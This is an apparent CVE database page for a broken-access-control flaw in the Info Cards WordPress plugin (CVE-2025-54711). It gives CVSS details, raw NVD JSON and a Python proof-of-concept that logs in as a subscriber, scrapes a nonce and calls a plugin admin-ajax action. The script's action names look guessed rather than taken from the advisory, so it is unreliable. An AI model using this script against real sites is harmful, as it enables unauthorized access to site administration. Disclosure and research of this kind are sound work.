Security Vulnerability Report
中文
CVE-2025-54711 CVSS 7.1 HIGH

CVE-2025-54711

Published: 2025-11-06 16:15:58
Last Modified: 2026-04-27 16:16:29

Description

Missing Authorization vulnerability in bPlugins Info Cards info-cards allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Info Cards: from n/a through <= 1.0.11.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

No configuration data available.

Info Cards插件 <= 1.0.11(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys target = "http://vulnerable-site.com" username = "subscriber" password = "user_password" session = requests.Session() # Step 1: Authenticate with WordPress login_url = f"{target}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In" } response = session.post(login_url, data=login_data) # Step 2: Get valid nonce from plugin admin page admin_url = f"{target}/wp-admin/admin.php?page=info-cards-settings" response = session.get(admin_url) # Extract nonce from page content (typical pattern: wpnonce in hidden fields) import re nonce_match = re.search(r'name="_wpnonce" value="([a-z0-9]+)"', response.text) if not nonce_match: print("Failed to extract nonce") sys.exit(1) nonce = nonce_match.group(1) # Step 3: Exploit the authorization bypass exploit_url = f"{target}/wp-admin/admin-ajax.php" exploit_data = { "action": "info_cards_admin_action", "_wpnonce": nonce, "sub_action": "export_settings", "format": "json" } response = session.post(exploit_url, data=exploit_data) print(f"Status: {response.status_code}") print(f"Response: {response.text}") # This demonstrates unauthorized access to admin functions

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54711", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:15:57.523", "lastModified": "2026-04-27T16:16:28.920", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in bPlugins Info Cards info-cards allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Info Cards: from n/a through <= 1.0.11."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/info-cards/vulnerability/wordpress-info-cards-plugin-1-0-11-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}